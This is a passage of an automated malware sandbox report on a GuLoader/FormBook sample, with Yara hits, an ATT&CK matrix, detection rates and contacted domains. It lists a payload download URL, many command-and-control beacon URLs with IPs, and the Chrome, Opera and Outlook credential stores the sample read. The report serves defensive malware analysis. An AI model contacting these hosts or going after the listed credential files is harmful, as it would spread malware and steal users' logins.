Source: explorer.exe, 0000000E.00000000.47758312609.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47852842448.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.48036459938.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47801972989.0000000001280000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.51924728169.0000000002D71000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000E.00000000.47850576107.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47756506661.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47800056030.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.48034350183.0000000000BA9000.00000004.00000020.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 0000000E.00000000.47758312609.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47852842448.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.48036459938.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47801972989.0000000001280000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.51924728169.0000000002D71000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000E.00000000.47768699367.0000000009713000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47813132765.0000000009713000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48048687198.0000000009713000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47865140469.0000000009713000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndH

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Generic Dropper

Show sources

Source: Yara match	File source: Process Memory Space: Zr26f1rL6r.exe PID: 6600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: c8ahotgz8h.exe PID: 5908, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: c8ahotgz8h.exe PID: 2508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: c8ahotgz8h.exe PID: 7388, type: MEMORYSTR

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Tries to steal Mail credentials (via file / registry access)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data	Jump to behavior

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Registry Run Keys / Startup Folder1	Process Injection712	Virtualization/Sandbox Evasion22	OS Credential Dumping1	Security Software Discovery421	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution1	DLL Side-Loading1	Registry Run Keys / Startup Folder1	Process Injection712	LSASS Memory	Virtualization/Sandbox Evasion22	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	DLL Side-Loading1	Deobfuscate/Decode Files or Information1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Local System1	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	File and Directory Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol15	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Rundll321	LSA Secrets	System Information Discovery4	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Zr26f1rL6r.exe	40%	Virustotal		Browse
Zr26f1rL6r.exe	20%	ReversingLabs	Win32.Trojan.GuLoader

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Grt4lhl\c8ahotgz8h.exe	20%	ReversingLabs	Win32.Trojan.GuLoader

Unpacked PE Files

Source	Detection	Scanner	Label	Download
15.2.rundll32.exe.488796c.4.unpack	100%	Avira	TR/Dropper.Gen	Download File
15.2.rundll32.exe.540a58.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
25.0.firefox.exe.4009796c.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
25.0.firefox.exe.4009796c.1.unpack	100%	Avira	TR/Dropper.Gen	Download File
25.2.firefox.exe.4009796c.0.unpack	100%	Avira	TR/Dropper.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
www.lopsrental.lease	3%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://atseasonals.com/GHrtt/bin_kbJoepxz175.bin	0%	Avira URL Cloud	safe
http://www.hsbp.online/	0%	Avira URL Cloud	safe
http://www.hsbp.online	0%	Avira URL Cloud	safe
https://atseasonals.com/O	0%	Avira URL Cloud	safe
http://www.inklusion.online/	0%	Avira URL Cloud	safe
https://atseasonals.com/V	0%	Avira URL Cloud	safe
www.ayudavida.com/n8ds/	0%	Avira URL Cloud	safe
http://www.mackthetruck.com	0%	Avira URL Cloud	safe
http://schemas.micro	0%	Avira URL Cloud	safe
http://www.stylesbykee.com/n8ds/?6ldD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&v6Mt=3fxxA4Z	0%	Avira URL Cloud	safe
https://atseasonals.com/(C	0%	Avira URL Cloud	safe
http://www.hsbp.online/n8ds/J	0%	Avira URL Cloud	safe
http://www.hsbp.online/n8ds/	0%	Avira URL Cloud	safe
http://www.growebox.com/n8ds/?6ldD=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&v6Mt=3fxxA4Z	0%	Avira URL Cloud	safe
http://www.unitedmetal-saudi.com/n8ds/?6ldD=diws0RRfDxwvVlRuoC4BJCkr8rc2YRL+Z6kcdn/HANybL0ntvNIGnh8uTRYHcPOHwusF&5jp=eZ4Pez	0%	Avira URL Cloud	safe
https://atseasonals.com/GHrtt/bin_kbJoepxz175.binv	0%	Avira URL Cloud	safe
https://atseasonals.com/GHrtt/bin_kbJoepxz175.binr	0%	Avira URL Cloud	safe
https://word.office.comERM	0%	Avira URL Cloud	safe
http://www.helpcloud.xyz/n8ds/?6ldD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl&5jp=eZ4Pez	0%	Avira URL Cloud	safe
http://www.jamiecongedo.com/n8ds/?6ldD=BkWPMdYTTR0ZQmtbwmm8ayu+d1W65DpSRIKYH6pwPIESNdIBtEF9Jb3WD/+idhQ1krue&2dfPiT=o6P8yX	100%	Avira URL Cloud	malware
https://atseasonals.com/GHrtt/bin_kbJoepxz175.binz	0%	Avira URL Cloud	safe
https://atseasonals.com/GHrtt/bin_kbJoepxz175.binf	0%	Avira URL Cloud	safe
https://atseasonals.com/GHrtt/bin_kbJoepxz175.binc	0%	Avira URL Cloud	safe
https://atseasonals.com/GHrtt/bin_kbJoepxz175.binh	0%	Avira URL Cloud	safe
http://www.divorcefearfreedom.com/n8ds/?2dfPiT=o6P8yX&6ldD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9	0%	Avira URL Cloud	safe
http://www.lopsrental.lease/n8ds/?6ldD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&v6Mt=3fxxA4Z	0%	Avira URL Cloud	safe
http://www.inklusion.online	0%	Avira URL Cloud	safe
http://www.inklusion.online/n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&5jp=eZ4Pez	0%	Avira URL Cloud	safe
https://atseasonals.com/j	0%	Avira URL Cloud	safe
http://www.inklusion.online/n8ds/	0%	Avira URL Cloud	safe
https://atseasonals.com/	0%	Avira URL Cloud	safe
https://atseasonals.com/GHrtt/bin_kbJoepxz175.binsj	0%	Avira URL Cloud	safe
http://www.ayudavida.com/n8ds/?6ldD=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4&v6Mt=3fxxA4Z	0%	Avira URL Cloud	safe
http://www.topwowshopping.store/n8ds/?6ldD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&v6Mt=3fxxA4Z	0%	Avira URL Cloud	safe
https://atseasonals.com/GHrtt/bin_kbJoepxz175.binN	0%	Avira URL Cloud	safe
https://atseasonals.com/r	0%	Avira URL Cloud	safe
https://excel.office.comR	0%	Avira URL Cloud	safe
http://www.inklusion.online/n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z	0%	Avira URL Cloud	safe
http://www.mackthetruck.com/n8ds/	0%	Avira URL Cloud	safe
https://atseasonals.com/GHrtt/bin_kbJoepxz175.binki	0%	Avira URL Cloud	safe
http://www.ozattaos.xyz/n8ds/?6ldD=n1UrTr6j/bQFz4e4Cp8BbMP0v/KiHdXZ9JkrSrs2y278xAws0T3fM8y5E13MJVyQk50j&5jp=eZ4Pez	0%	Avira URL Cloud	safe
https://atseasonals.com/GHrtt/bin_kbJoepxz175.bin7	0%	Avira URL Cloud	safe
http://www.mackthetruck.com/n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z	0%	Avira URL Cloud	safe
http://www.hsbp.online/n8ds/%	0%	Avira URL Cloud	safe
https://atseasonals.com/GHrtt/bin_kbJoepxz175.bin5	0%	Avira URL Cloud	safe
https://atseasonals.com/GHrtt/bin_kbJoepxz175.bin?	0%	Avira URL Cloud	safe
https://atseasonals.com/GHrtt/bin_k	0%	Avira URL Cloud	safe
https://atseasonals.com/GHrtt/bin_kbJoepxz175.bin:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
growebox.com	81.2.194.128	true	true		unknown
www.hsbp.online	116.62.216.226	true	true		unknown
www.lopsrental.lease	66.29.140.185	true	true	3%, Virustotal, Browse	unknown
www.topwowshopping.store	104.21.76.223	true	true		unknown
www.inklusion.online	3.64.163.50	true	true		unknown
www.mackthetruck.com	203.170.80.250	true	true		unknown
divorcefearfreedom.com	192.0.78.25	true	true		unknown
littlefishth.com	34.102.136.180	true	true		unknown
www.ayudavida.com	164.155.212.139	true	true		unknown
zhs.zohosites.com	136.143.191.204	true	false		high
www.ozattaos.xyz	172.67.164.153	true	true		unknown
www.helpcloud.xyz	88.99.22.5	true	true		unknown
www.stylesbykee.com	172.120.157.187	true	true		unknown
ext-sq.squarespace.com	198.185.159.144	true	false		high
atseasonals.com	107.6.148.162	true	true		unknown
www.3uwz9mpxk77g.biz	unknown	unknown	true		unknown
www.testwebsite0711.com	unknown	unknown	true		unknown
www.jamiecongedo.com	unknown	unknown	true		unknown
www.learncodeing.com	unknown	unknown	true		unknown
www.divorcefearfreedom.com	unknown	unknown	true		unknown
www.littlefishth.com	unknown	unknown	true		unknown
www.recruitresumelibrary.com	unknown	unknown	true		unknown
www.abcjanitorialsolutions.com	unknown	unknown	true		unknown
www.growebox.com	unknown	unknown	true		unknown
www.braxtynmi.xyz	unknown	unknown	true		unknown
www.tvterradafarinha.com	unknown	unknown	true		unknown
www.unitedmetal-saudi.com	unknown	unknown	true		unknown
www.diamota.com	unknown	unknown	true		unknown
www.aubzo7o9fm.com	unknown	unknown	true		unknown
www.photon4energy.com	unknown	unknown	true		unknown
www.koedayuuki.com	unknown	unknown	true		unknown
www.recoverytrivia.com	unknown	unknown	true		unknown
www.wordpresshostingblog.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://atseasonals.com/GHrtt/bin_kbJoepxz175.bin	false	Avira URL Cloud: safe	unknown
www.ayudavida.com/n8ds/	true	Avira URL Cloud: safe	low
http://www.stylesbykee.com/n8ds/?6ldD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&v6Mt=3fxxA4Z	true	Avira URL Cloud: safe	unknown
http://www.growebox.com/n8ds/?6ldD=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&v6Mt=3fxxA4Z	true	Avira URL Cloud: safe	unknown
http://www.unitedmetal-saudi.com/n8ds/?6ldD=diws0RRfDxwvVlRuoC4BJCkr8rc2YRL+Z6kcdn/HANybL0ntvNIGnh8uTRYHcPOHwusF&5jp=eZ4Pez	true	Avira URL Cloud: safe	unknown
http://www.helpcloud.xyz/n8ds/?6ldD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl&5jp=eZ4Pez	true	Avira URL Cloud: safe	unknown
http://www.jamiecongedo.com/n8ds/?6ldD=BkWPMdYTTR0ZQmtbwmm8ayu+d1W65DpSRIKYH6pwPIESNdIBtEF9Jb3WD/+idhQ1krue&2dfPiT=o6P8yX	true	Avira URL Cloud: malware	unknown
http://www.divorcefearfreedom.com/n8ds/?2dfPiT=o6P8yX&6ldD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9	true	Avira URL Cloud: safe	unknown
http://www.lopsrental.lease/n8ds/?6ldD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&v6Mt=3fxxA4Z	true	Avira URL Cloud: safe	unknown
http://www.inklusion.online/n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&5jp=eZ4Pez	true	Avira URL Cloud: safe	unknown
http://www.inklusion.online/n8ds/	true	Avira URL Cloud: safe	unknown
http://www.ayudavida.com/n8ds/?6ldD=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4&v6Mt=3fxxA4Z	true	Avira URL Cloud: safe	unknown
http://www.topwowshopping.store/n8ds/?6ldD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&v6Mt=3fxxA4Z	true	Avira URL Cloud: safe	unknown
http://www.inklusion.online/n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z	true	Avira URL Cloud: safe	unknown
http://www.mackthetruck.com/n8ds/	true	Avira URL Cloud: safe	unknown
http://www.ozattaos.xyz/n8ds/?6ldD=n1UrTr6j/bQFz4e4Cp8BbMP0v/KiHdXZ9JkrSrs2y278xAws0T3fM8y5E13MJVyQk50j&5jp=eZ4Pez	true	Avira URL Cloud: safe	unknown
http://www.mackthetruck.com/n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z	true	Avira URL Cloud: safe	unknown
https://atseasonals.com/GHrtt/bin_k	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 0000000E.00000000.47874813973.000000000CF16000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47776930012.000000000CF16000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47822671191.000000000CF16000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48059253860.000000000CF16000.00000004.00000001.sdmp	false		high
http://www.hsbp.online/	rundll32.exe, 0000000F.00000002.51919439469.00000000005D2000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hsbp.online	rundll32.exe, 0000000F.00000002.51929871775.0000000004981000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://atseasonals.com/O	c8ahotgz8h.exe, 0000001D.00000003.51656071026.000000000093C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51662682902.000000000093F000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51655285321.000000000093C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.inklusion.online/	rundll32.exe, 0000000F.00000002.51930074109.0000000004A02000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://atseasonals.com/V	Zr26f1rL6r.exe, 0000000A.00000002.47939178909.0000000000828000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 0000000E.00000000.47850576107.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47756506661.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47800056030.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.48034350183.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmp	false		high
https://www.zoho.com/sites/images/professionally-crafted-themes.png	rundll32.exe, 0000000F.00000002.51930074109.0000000004A02000.00000004.00020000.sdmp, firefox.exe, 00000019.00000000.50661739455.0000000040212000.00000004.00020000.sdmp	false		high
http://www.mackthetruck.com	rundll32.exe, 0000000F.00000002.51930419796.000000000507B000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 0000000E.00000000.47774864959.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47820777870.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48057235938.000000000CD5E000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47872878262.000000000CD5E000.00000004.00000001.sdmp	false		high
https://www.msn.com/?ocid=iehpf	explorer.exe, 0000000E.00000000.47784524251.000000000EEF9000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47883648212.000000000EEF9000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48068672624.000000000EEF9000.00000004.00000001.sdmp	false		high
http://schemas.micro	explorer.exe, 0000000E.00000000.47770414117.00000000099E0000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47869230194.000000000AB30000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47854578029.0000000003060000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/odirm	explorer.exe, 0000000E.00000000.48048119623.0000000009690000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47864616696.0000000009690000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47768196701.0000000009690000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47812562770.0000000009690000.00000004.00000001.sdmp	false		high
https://atseasonals.com/(C	c8ahotgz8h.exe, 0000001E.00000003.51735030977.000000000081C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51741787959.000000000081C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant	explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmp	false		high
http://www.hsbp.online/n8ds/J	rundll32.exe, 0000000F.00000002.51918468762.000000000056D000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hsbp.online/n8ds/	rundll32.exe, 0000000F.00000002.51918468762.000000000056D000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://atseasonals.com/GHrtt/bin_kbJoepxz175.binv	c8ahotgz8h.exe, 0000001C.00000003.51528821495.00000000008B5000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51535905323.00000000008B8000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51527312447.00000000008B5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-ch/?ocid=iehp	explorer.exe, 0000000E.00000000.47784748807.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47883880392.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48068924445.000000000EF25000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47831331678.000000000EF25000.00000004.00000001.sdmp	false		high
https://atseasonals.com/GHrtt/bin_kbJoepxz175.binr	c8ahotgz8h.exe, 0000001D.00000003.51656071026.000000000093C000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51662682902.000000000093F000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51655285321.000000000093C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://word.office.comERM	explorer.exe, 0000000E.00000000.47785341838.000000000EFD3000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47884525270.000000000EFD3000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47831983966.000000000EFD3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://atseasonals.com/GHrtt/bin_kbJoepxz175.binz	c8ahotgz8h.exe, 0000001D.00000002.51662442297.0000000000914000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg	explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmp	false		high
https://atseasonals.com/GHrtt/bin_kbJoepxz175.binf	c8ahotgz8h.exe, 0000001E.00000002.51741391174.00000000007E5000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin	explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmp	false		high
https://atseasonals.com/GHrtt/bin_kbJoepxz175.binc	Zr26f1rL6r.exe, 0000000A.00000002.47939178909.0000000000828000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://atseasonals.com/GHrtt/bin_kbJoepxz175.binh	c8ahotgz8h.exe, 0000001C.00000003.51528821495.00000000008B5000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51535905323.00000000008B8000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51527312447.00000000008B5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/	explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmp	false		high
http://www.inklusion.online	rundll32.exe, 0000000F.00000002.51930074109.0000000004A02000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://powerpoint.office.com	explorer.exe, 0000000E.00000000.47784524251.000000000EEF9000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47883648212.000000000EEF9000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48068672624.000000000EEF9000.00000004.00000001.sdmp	false		high
http://www.foreca.com	explorer.exe, 0000000E.00000000.47809254272.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47860878706.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47764744020.0000000005239000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48044313141.0000000005239000.00000004.00000001.sdmp	false		high
